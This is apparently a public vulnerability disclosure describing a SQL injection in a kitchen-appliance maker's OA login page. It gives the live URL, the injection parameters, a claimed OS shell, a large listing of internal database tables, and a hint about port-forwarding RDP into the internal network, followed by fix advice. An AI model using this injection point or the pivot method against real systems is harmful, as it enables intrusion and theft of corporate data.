2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
专业厨房电器
老板电器 OA 系统:http://oa.robam.com/oa/login.asp
注入点(POST):button1=%b5%c7%c2%bc&pwd=1&uid=F
登录接口的 uid 参数未做过滤,存在 SQL 注入。
通过该注入点可枚举出 27 个数据库:
可获得 os-shell(即可在数据库服务器上执行系统命令):
可访问大量企业内部数据,以下为各库的表名及记录数:
Database: robam
+---------------------------------------------+---------+| Table | Entries |+---------------------------------------------+---------+| dbo.EB_RECALL_RESULT | 20641984 || dbo.WF_ACTIVE_HISTORY | 15304619 || dbo.EB_REPAIR_PROCESS | 10388513 || dbo.EB_REPAIR_PROCESS_BK | 6507983 || dbo.ST_STOCK_DETAIL_CENTER_PRODUCT | 6141723 || dbo.EB_CUSTOMER_PRODUCT | 5447744 || dbo.EB_GOODSBILL_DETAIL_HISTORY | 4263896 || dbo.EB_SELLBILL_DETAIL_HISTORY | 4262997 || dbo.ST_STOCK_BILL_CENTER_PRODUCT | 4159260 || dbo.ST_STOCK_DETAIL_CENTER_PRODUCT_BF | 4073056 || dbo.ST_APPLY_BILL_DETAIL_HISTORY | 3116113 || dbo.EB_GOODSBILL_DETAIL_HISTORY_BK | 2764312 || dbo.EB_REPAIR_HISTORY | 2671226 || dbo.ST_STOCK_BILL_CENTER_PRODUCT_BF | 2656724 || dbo.WF_STATE_HISTORY | 2460002 || dbo.EB_CUSTOMER | 2171553 || dbo.SYS_LOGIN_USERS | 2133212 || dbo.ST_DAILY_STOCK_CENTER_PRODUCT | 1971417 || dbo.EB_BALANCE_DETAIL | 1922419 || dbo.EB_GOODS_BILL_HISTORY | 1688643 || dbo.EB_REPAIR_HISTORY_BK | 1628772 || dbo.EB_SELL_BILL_HISTORY | 1572831 || dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_NEW | 1550110 || dbo.EB_REPAIR_FAULTCODE | 1397925 || dbo.ST_STOCK_DETAIL_OTHER_PRODUCT | 1295683 || dbo.EB_BALANCE_DETAIL_BK | 1105139 || dbo.EB_GOODS_BILL_HISTORY_BK | 1086769 || dbo.EB_RECALL_HISTORY | 894542 || dbo.ST_STOCK_BILL_OTHER_PRODUCT | 865518 || dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_NEW | 857202 || dbo.ST_DAILY_STOCK_OTHER_PRODUCT | 853046 || dbo.ST_DAILY_STOCK_CENTER_FITTINGS_NEW | 807257 || dbo.EB_REPAIR_FITTINGS | 784124 || dbo.ST_STOCK_BILL_CENTER_FITTINGS_NEW | 741384 || dbo.ST_APPLY_BILL_HISTORY | 691997 || dbo.ST_STOCK_DETAIL_SHOP_PRODUCT | 590716 || dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_OLD | 511680 || dbo.EB_REPAIR_FITTINGS_TEMP | 469633 || dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_OLD | 459449 || dbo.ST_STOCK_DETAIL_SHOP_PRODUCT_BF | 447865 || dbo.ST_STOCK_BILL_WORKER_FITTINGS_NEW | 447853 || dbo.ST_STOCK_BILL_WORKER_FITTINGS_OLD | 439128 || dbo.ST_STOCK_BILL_CENTER_FITTINGS_OLD | 379192 || 
dbo.ST_STOCK_DETAIL_CHANNEL_PRODUCT | 365679 || dbo.ST_APPLY_DETAIL_SHOWPIECE_HISTORY | 341018 || dbo.ST_STOCK_BILL_SHOP_PRODUCT | 325635 || dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_NEW | 325029 || dbo.ST_DAILY_STOCK_SHOP_PRODUCT | 297876 || dbo.ST_PACKAGE_DETAIL | 281080 || dbo.WF_ACTIVE | 280034 || dbo.ST_SEND_BILL_DETAIL_HISTORY | 279288 || dbo.ST_DAILY_STOCK_CHANNEL_PRODUCT | 266890 || dbo.ST_RETURN_DETAIL_SHOWPIECE_HISTORY | 262061 || dbo.EB_SERVICE_DETAIL | 260659 || dbo.EB_SELLBILL_DETAIL | 246657 || dbo.WF_ACTIVE_BK | 246640 || dbo.EB_REPAIR_FITTINGS_DETAIL | 239402 || dbo.ST_STOCK_BILL_SHOP_PRODUCT_BF | 231832 || dbo.ST_DAILY_STOCK_HEAD_FITTINGS_NEW | 230008 || dbo.ST_DAILY_STOCK_CENTER_FITTINGS_OLD | 228593 || dbo.EB_CUSTOMER_FITTINGS | 193663 || dbo.ST_MONEY_BILL_WORKER | 168248 || dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_NEW | 157316 || dbo.EB_CUSTOMER_VIP | 139003 || dbo.EB_REPAIR | 112740 || dbo.ST_MONEY_BILL_WORKER_BAK | 111497 || dbo.ST_STOCK_BILL_CHANNEL_PRODUCT | 110340 || dbo.TABLE89 | 106284 || dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_OLD | 102738 || dbo.ST_DAILY_STOCK_SHOP_FITTINGS_NEW | 94899 || dbo.ST_RETURN_BILL_SHOWPIECE_HISTORY | 89161 || dbo.ST_STOCK_BILL_SHOP_FITTINGS_NEW | 83769 || dbo.ST_APPLY_BILL_SHOWPIECE_HISTORY | 83203 || dbo.WF_APPROVE_HISTORY | 77426 || dbo.ST_STOCK_TRACK_CHANNEL_PRODUCT | 77156 || dbo.EB_SELL_BILL | 75864 || dbo.ST_STOCK_TRACK_WORKER_FITTINGS_OLD | 68195 || dbo.EB_REPAIR_FITTINGS_BK | 61940 || dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_OLD | 59814 || dbo.EB_REPAIR_NOCALL | 58181 || dbo.EB_GOODSBILL_DETAIL | 54096 || dbo.ST_STOCK_BILL_SHOP_FITTINGS_OLD | 47382 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW | 44645 || dbo.ST_STOCK_TRACK_OTHER_PRODUCT | 43526 || dbo.ST_STOCK_BILL_HEAD_FITTINGS_NEW | 34841 || dbo.ST_DAILY_STOCK_SHOP_FITTINGS_OLD | 34703 || dbo.ST_STOCK_TRACK_CENTER_PRODUCT | 32642 || dbo.ST_DAILY_STOCK_HEAD_FITTINGS_OLD | 32359 || dbo.ST_MONEY_BILL | 29214 || dbo.ST_SEND_BILL_HISTORY | 24706 || dbo.WF_STATE | 23913 || 
dbo.EB_CHANGESTYLE_DETAIL | 23897 || dbo.EB_APPEAL_PROCESS | 23762 || dbo.WF_STATE_BK | 23144 || dbo.ST_PACKAGE | 22869 || dbo.EB_GOODS_BILL | 21874 || dbo.EB_GAS_NEW_DETAIL | 21326 || dbo.EB_GAS_OLD_DETAIL | 21295 || dbo.EB_CHANNEL_SELLBILL_DETAIL | 17701 || dbo.EB_GAS_CHANGE | 17351 || dbo.EB_CHANNEL_SELLBILL_DETAIL_HISTORY | 16737 || dbo.SYS_PART_SUB_FUNC | 13198 || dbo.SYS_ORGANIZATION | 12753 || dbo.UR_USERS_PART | 11185 || dbo.SYS_PART_FUNC | 11073 || dbo.SYS_ORGANIZATION_BK_100613 | 10424 || dbo.EB_CHANNEL_SELL_BILL_HISTORY | 9374 || dbo.SYS_MESSAGE_PERSON | 9215 || dbo.EB_MARKET | 8555 || dbo.EB_CHANGE_STYLE | 8098 || dbo.ST_APPLY_BILL_DETAIL | 7956 || dbo.ST_STOCK_TRACK_WORKER_FITTINGS_NEW | 7589 || dbo.EB_CHANNEL_SELL_BILL | 7218 || dbo.ST_STOCK_TRACK_SHOP_FITTINGS_NEW | 7142 || dbo.SYS_MESSAGE | 6708 || dbo.UR_USERS | 6647 || dbo.ST_APPLY_DISREPAIR_HISTORY | 6505 || dbo.EB_DELRP_LOG | 5831 || dbo.CD_SX_BAK | 5815 || dbo.SYS_FITTINGS | 5569 || dbo.EB_APPEAL | 5540 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW_0616 | 5463 || dbo.EB_SHOP_HUMAN | 4740 || dbo.ST_STOCK_TRACK_HEAD_FITTINGS_NEW | 4718 || dbo.EB_CONSULTING | 4674 || dbo.EB_RECALL | 4641 || dbo.EB_CHANNEL | 4554 || dbo.CD_SX | 4531 || dbo.ST_STOCK_TRACK_HEAD_FITTINGS_OLD | 4509 || dbo.EB_BROWER | 4314 || dbo.EB_RECALL_CREATE | 3980 || dbo.EB_PRICE_DETAIL | 3974 || dbo.ST_STOCK_TRACK_SHOP_PRODUCT | 3853 || dbo.SYS_SERVICE_LOG | 3632 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_OLD | 3064 || dbo.ST_STOCK_BILL_HEAD_FITTINGS_OLD | 2592 || dbo.ST_MONEY_LIMIT_WORKER | 2085 || dbo.ST_SEND_BILL_DETAIL | 1893 || dbo.EB_OTHERS | 1856 || dbo.ST_MONEY_LIMIT_WORKER_BAK | 1708 || dbo.SYS_ORGANIZATION_BK2 | 1678 || dbo.SYS_ORGANIZATION_BK | 1657 || dbo.SYS_ORGANIZATION_LEON | 1650 || dbo.EB_REPAIR_DISCALL | 1643 || dbo.EB_BALANCE | 1603 || dbo.SYS_BOARD_ORG | 1143 || dbo.ST_APPLY_BILL | 1118 || dbo.UR_USERS_BK_100613 | 1100 || dbo.EB_SHOP | 1089 || dbo.EB_MARKET_BK | 1024 || dbo.SYS_PRODUCT | 900 || dbo.WF_STEP_SETTING | 
801 || dbo.SYS_FITTINGS_SAFE_NUM | 730 || dbo.ST_RETURN_DETAIL_SHOWPIECE | 719 || dbo.SYS_SUB_FUNC | 699 || dbo.EB_REPAIR_NONUM | 602 || dbo.ST_APPLY_DETAIL_SHOWPIECE | 585 || dbo.EB_GOODS_CHANGE | 545 || dbo.RTS_REPORT_DETAIL_CONDITION | 510 || dbo.SMS_MESSAGE_LOG | 479 || dbo.ST_STOCK_TRACK_SHOP_FITTINGS_OLD | 474 || dbo.RTS_REPORT_DETAIL_PART | 462 || dbo.SYS_FAULT_CODE | 443 || dbo.EB_WORKERGROUP | 404 || dbo.EB_CHANNEL_BK | 358 || dbo.CD_TELAREA | 346 || dbo.SYS_FUNCTION | 304 || dbo.UR_PART | 264 || dbo.ST_RETURN_BILL_SHOWPIECE | 223 || dbo.WF_STEP_RELATIONSHIP | 203 || dbo.WF_STEP | 193 || dbo.WF_STEP_GRAPHIC | 193 || dbo.ID_CODEID | 189 || dbo.ST_APPLY_BILL_SHOWPIECE | 182 || dbo.EB_QNAIRE_ITEM | 179 || dbo.ST_SEND_BILL | 174 || dbo.EB_KNOWLEDGE_ARTICLE | 171 || dbo.WF_FUNCTION_SETTING | 136 || dbo.SYS_MESSAGE_GROUP | 104 || dbo.ST_MONEY_LIMIT | 92 || dbo.ST_TEMP_TRACK_CENTER_FITTINGS_NEW | 81 || dbo.ORG_ID_FLOWID | 78 || dbo.EB_QNAIRE_QUESTION | 75 || dbo.RTS_REPORT_SETTING | 75 || dbo.SYS_ORG_GROUP_DETAIL | 75 || dbo.RTS_REPORT_CONDITION | 74 || dbo.CD_BILL_TYPE | 68 || dbo.SMS_MESSAGE_SEND | 64 || dbo.CD_SX_TO | 60 || dbo.SYS_USER_GROUP_MEMBER | 46 || dbo.SMS_SendMessage | 36 || dbo.SYS_CATEGORY | 32 || dbo.EB_QUESTION_TYPE | 31 || dbo.WF_WORKFLOW_MODEL | 28 || dbo.EB_BALANCE_DETAIL_OTHER | 27 || dbo.EB_FEE_POLICY_DETAIL | 27 || dbo.WF_OPERATION_FUNCTION | 27 || dbo.CD_YEAR | 26 || dbo.EB_KNOWLEDGE_CATEGORY | 26 || dbo.CD_SEND_TYPE | 23 || dbo.CD_MESSAGESEND_STATUS | 22 || dbo.ID_FLOWID | 21 || dbo.SMS_MESSAGE_CONDITION | 21 || dbo.CD_APPEAL_TYPE | 18 || dbo.SYS_BOARD | 18 || dbo.CD_OUT_SUBJECT_CENTER_PRODUCT | 17 || dbo.SMS_MESSAGE_EMPLOYEEADD | 17 || dbo.SMS_MESSAGE_TASK | 17 || dbo.SYS_BOARD_GROUP | 17 || dbo.CD_OUT_SUBJECT_OTHER_PRODUCT | 16 || dbo.CD_OUT_SUBJECT_SHOP_PRODUCT | 16 || dbo.CD_REPAIR_METHOD | 16 || dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_NEW | 15 || dbo.CD_IN_SUBJECT_CENTER_PRODUCT | 14 || dbo.EB_QNAIRE_TEMPLATE | 14 || 
dbo.SMS_MESSAGE_TEMPLATE | 14 || dbo.SMS_ReceiveMessage | 14 || dbo.ST_STOCK_TABLE_NAME | 14 || dbo.EB_SELLBILL_DETAIL_SELLER | 13 || dbo.CD_IN_SUBJECT_OTHER_PRODUCT | 12 || dbo.CD_IN_SUBJECT_SHOP_PRODUCT | 12 || dbo.CD_MONTH | 12 || dbo.SMS_MESSAGE_EMPLOYEEADD_GROUP_DETAIL | 12 || dbo.CD_EDUCATION | 11 || dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_NEW | 11 || dbo.CD_PRODUCT_CUSTOMER | 11 || dbo.WF_CD_ACTIVE_STATUS | 11 || dbo.ZQ_CUSTOMER | 11 || dbo.CD_ORG_PRICE | 10 || dbo.CD_IN_SUBJECT_CENTER_FITTINGS_NEW | 9 || dbo.CD_IN_SUBJECT_HEAD_FITTINGS_NEW | 9 || dbo.CD_REPAIR_STATUS | 9 || dbo.RTS_CD_REPORT_GROUP | 9 || dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_NEW | 8 || dbo.EB_SALES_INFO | 8 || dbo.EB_SELLER | 8 || dbo.SMS_ISR | 8 || dbo.ST_APPLY_DISREPAIR | 8 || dbo.CD_APPLY_BILL_STATUS | 7 || dbo.CD_IN_SUBJECT_HEAD_FITTINGS_OLD | 7 || dbo.CD_OUT_SUBJECT_PRODUCT | 7 || dbo.SMS_MESSAGE_USERHIDE | 7 || dbo.CD_CONSULT_TYPE | 6 || dbo.CD_IN_SUBJECT_CENTER_FITTINGS_OLD | 6 || dbo.CD_ORG_LEVEL | 6 || dbo.CD_ORG_PRODUCT_PRICE | 6 || dbo.CD_REPAIR_TYPE | 6 || dbo.CD_WF_CHANGE | 6 || dbo.CD_YYMM | 6 || dbo.CODE_TABLE_LIST | 6 || dbo.EB_PRODUCT_USER_DETAIL | 6 || dbo.CD_BUY_REASON | 5 || dbo.CD_COLORS | 5 || dbo.CD_CUSTOMER_FEEL | 5 || dbo.CD_IN_SUBJECT_PRODUCT | 5 || dbo.CD_IN_SUBJECT_SHOP_FITTINGS_NEW | 5 || dbo.CD_IN_SUBJECT_SHOP_FITTINGS_OLD | 5 || dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_OLD | 5 || dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_OLD | 5 || dbo.CD_QUESTION_TYPE | 5 || dbo.CD_RECALL_TYPE | 5 || dbo.CD_REPAIR_FEE_TYPE | 5 || dbo.EB_CUSTOMER_FEEL | 5 || dbo.RTS_CD_FIELD_EDIT_TYPE | 5 || dbo.WF_CD_WORKFLOW_STATUS | 5 || dbo.CD_ADVERSARY | 4 || dbo.CD_APPEAL_LEVEL | 4 || dbo.CD_APPEAL_SOURCE | 4 || dbo.CD_APPEAL_STATUS | 4 || dbo.CD_BALANCE_STATUS | 4 || dbo.CD_BOOK_TIME | 4 || dbo.CD_CUS_JOB | 4 || dbo.CD_INVOICE_LEVEL | 4 || dbo.CD_MEMBER_TYPE | 4 || dbo.CD_OTHERS_TYPE | 4 || dbo.CD_PRODUCT_TYPE | 4 || dbo.CD_PROMOTION | 4 || dbo.CD_RECALL_FACT | 4 || dbo.CD_SELLPRO_STATUS | 4 || dbo.CD_SEND_INFO | 
4 || dbo.CD_STOCK_PRODUCT_ATTRIBUTE | 4 || dbo.SYS_RECALL_SETUP | 4 || dbo.WF_CD_ORG_LEVEL | 4 || dbo.CD_ADV_TYPE | 3 || dbo.CD_COUNT_UNIT | 3 || dbo.CD_CUS_REGION | 3 || dbo.CD_CUS_SATIS | 3 || dbo.CD_CUSPROD_REPAIR | 3 || dbo.CD_FAULT_GRADE | 3 || dbo.CD_INSTALL_SITE | 3 || dbo.CD_INVOICE_TYPE | 3 || dbo.CD_ISLSF | 3 || dbo.CD_OUT_SUBJECT_CHANNEL_PRODUCT | 3 || dbo.CD_PACKAGE_STATUS | 3 || dbo.CD_POLICY | 3 || dbo.CD_PRESENT_DEPTH | 3 || dbo.CD_PRODUCT_LEVEL | 3 || dbo.CD_RECALL_STATE | 3 || dbo.CD_RECALL_STATUS | 3 || dbo.CD_REPAIR_MODE | 3 || dbo.CD_REPAIR_PRI | 3 || dbo.CD_REPAIR_URGENT | 3 || dbo.CD_SELLBILL_STATUS | 3 || dbo.CD_SERVER_MODE | 3 || dbo.EB_FEE_POLICY | 3 || dbo.SYS_FITTINGS_PLACE | 3 || dbo.SYS_USER_GROUP | 3 || dbo.temp | 3 || dbo.WF_CD_FUNCTION_TYPE | 3 || dbo.WF_CD_STEP_TYPE | 3 || dbo.WF_USER_DELEGATE | 3 || dbo.CD_APPROVE | 2 || dbo.CD_CONSULT_STATUS | 2 || dbo.CD_CUS_TYPE | 2 || dbo.CD_FAULT_TYPE | 2 || dbo.CD_FEP_PAY_TYPE | 2 || dbo.CD_FEP_PAY_WAY | 2 || dbo.CD_FITTINGS_TYPE | 2 || dbo.CD_GOODS_WAY | 2 || dbo.CD_IN_SUBJECT_CHANNEL_PRODUCT | 2 || dbo.CD_MONEY_CHANGE_TYPE | 2 || dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_OLD | 2 || dbo.CD_PART_TYPE | 2 || dbo.CD_PAY_STATUS | 2 || dbo.CD_PREMONEY_PLACE | 2 || dbo.CD_PRINT_STATE | 2 || dbo.CD_PROD_TYPE | 2 || dbo.CD_PRODUCE_TYPE | 2 || dbo.CD_PRODUCT_STATUS | 2 || dbo.CD_RECALL_MOD | 2 || dbo.CD_REPAIR_LEVEL | 2 || dbo.CD_REPAIR_SORT | 2 || dbo.CD_RPT_INOUT | 2 || dbo.CD_RPT_NEWOLD | 2 || dbo.CD_RPT_SUBJECT | 2 || dbo.CD_SELLPRODUCT_TYPE | 2 || dbo.CD_SEX | 2 || dbo.CD_USE_STATUS | 2 || dbo.CD_YESNO | 2 || dbo.EB_SELL_BILL_SELLER | 2 || dbo.ST_MONEY_BILL_PRODUCT | 2 || dbo.ST_MONEY_LIMIT_PRODUCT | 2 || dbo.WF_CD_OCCUPY_TYPE | 2 || dbo.WF_CD_USER_DELEGATE_STATUS | 2 || dbo.ZQ_CUSTOMER_PRODUCT | 2 || dbo.CD_IN_SUBJECT_WORKER_FITTINGS_NEW | 1 || dbo.CD_IN_SUBJECT_WORKER_FITTINGS_OLD | 1 || dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_NEW | 1 || dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_OLD | 1 || dbo.CD_RPTOTAL_CUS | 1 
|| dbo.CD_SERVICE_CONDITON | 1 || dbo.EB_FEE_TRANS | 1 || dbo.EB_GZ | 1 || dbo.EB_KNOWLEDGE_SEARCH | 1 || dbo.EB_MINPRICE_PRODUCT | 1 || dbo.EB_PBFEE_DETAIL | 1 || dbo.EB_PRODUCT_USER | 1 || dbo.SMS_MESSAGE_DISPATCH | 1 || dbo.SMS_Register | 1 || dbo.ST_STOCK_SETTING | 1 || dbo.SYS_ORG_GROUP | 1 |+---------------------------------------------+---------+
Database: portal
+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.UserTrackerPath | 8560269 || dbo.UserTracker | 889885 || dbo.AnnouncementsView | 207526 || dbo.Permission_ | 60027 || dbo.Users_Permissions | 56106 || dbo.userdata2 | 29558 || dbo.UserData | 29307 || dbo.LayoutSet | 19617 || dbo.QuestionnaireAnswer | 17989 || dbo.Resource_ | 12333 || dbo.UserGroupRole | 10464 || dbo.Group_ | 9812 || dbo.Users_Roles | 9484 || dbo.Users_Groups | 9480 || dbo.Users_UserGroups | 4481 || dbo.AnnouncementsDelivery | 3543 || dbo.Contact_ | 2770 || dbo.User_ | 2769 || dbo.PortletPreferences | 2706 || dbo.temp_users | 2265 || dbo.TagsAsset | 2208 || dbo.User_bak | 2010 || dbo.user38 | 1851 || dbo.MyMenu | 1736 || dbo.Chat_Status | 1729 || dbo.BrowserTracker | 1722 || dbo.UNUser | 1665 || dbo.Groups_Permissions | 1547 || dbo.CalMapping | 1530 || dbo.MyProperties | 1468 || dbo.Image | 1426 || dbo.tmpuserid | 1228 || dbo.ResourceCode | 1183 || dbo.User__bak | 1183 || dbo.Phone | 826 || dbo.IGImage | 702 || dbo.Users_Orgs_bak | 695 || dbo.tmp_phone | 654 || dbo.Phone3 | 646 || dbo.Chat_Entry | 633 || dbo.CalEvent | 573 || dbo.Announcements | 540 || dbo.UserMenu | 533 || dbo.CalEvent_bak | 502 || dbo.DLFileRank | 419 || dbo.AnnouncementFile | 403 || dbo.Organization_ | 322 || dbo.Users_Orgs | 300 || dbo._sessioninfo | 282 || dbo.QuestionnaireReply | 279 || dbo.QuestionnaireChoice | 240 || dbo.QuestionnaireStat | 240 || dbo.Region | 236 || dbo.EventHistory | 231 || dbo.Country | 227 || dbo.Users_Orgs_0306 | 194 || dbo.ClassName_ | 174 || dbo.Phone2 | 173 || dbo.SocialActivity | 165 || dbo.tmporg | 142 || dbo.tmporg2 | 141 || dbo.Roles_Permissions | 115 || dbo.UserMap | 72 || dbo.UserMapPicture | 72 || dbo.ListType | 63 || dbo.QuestionnaireQuestion | 60 || dbo.EventHistoryView | 54 || dbo.Sidmapping | 27 || dbo.IGFolder | 23 || dbo.ForeignCompany | 20 || dbo.ForeignCompanyUser | 18 || dbo.DataMaskRule | 16 || dbo.EmailAddress | 16 || 
dbo.PersonalInfoCol | 16 || dbo.czguser | 15 || dbo.Layout | 13 || dbo.Counter | 12 || dbo.Role_ | 11 || dbo.OrgLabor | 10 || dbo.SysProperties | 9 || dbo.Label | 7 || dbo.Marquee | 7 || dbo.BookingSessionDevice | 6 || dbo.BookingSessionRoom | 6 || dbo.Message | 6 || dbo.CalEventFile | 5 || dbo.MsgEventFile | 5 || dbo.QUARTZ_LOCKS | 5 || dbo.UserGroup | 5 || dbo.MBDiscussion | 4 || dbo.MBMessage | 4 || dbo.MBThread | 4 || dbo.Address | 3 || dbo.AnnouncementType | 3 || dbo.DLFileEntry | 3 || dbo.ForeignCompanyMapping | 3 || dbo.PollsChoice | 3 || dbo.AnnouncementFileTemp | 2 || dbo.DLFolder | 2 || dbo.MBCategory | 2 || dbo.RatingsEntry | 2 || dbo.RatingsStats | 2 || dbo.UserMenuIcon | 2 || dbo.Account_ | 1 || dbo.BookingSessionRoomFile | 1 || dbo.Company | 1 || dbo.DscGroupCal | 1 || dbo.Label_Portlet | 1 || dbo.MBMailingList | 1 || dbo.PasswordPolicy | 1 || dbo.PollsQuestion | 1 || dbo.Questionnaire | 1 || dbo.QuestionnaireType | 1 || dbo.Release_ | 1 || dbo.ServiceComponent | 1 || dbo.SessionRoom | 1 |+----------------------------+---------+
进一步风险:借助 lcx 之类的工具对 3389 端口做转发后,可进入内网。
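修复建议:检查 login.asp 对 uid 等登录参数的处理,改用参数化查询,不要把用户输入直接拼接进 SQL 语句;同时降低 Web 应用所用数据库账户的权限,使其无法执行系统命令,并限制服务器 3389 端口的访问来源。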
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)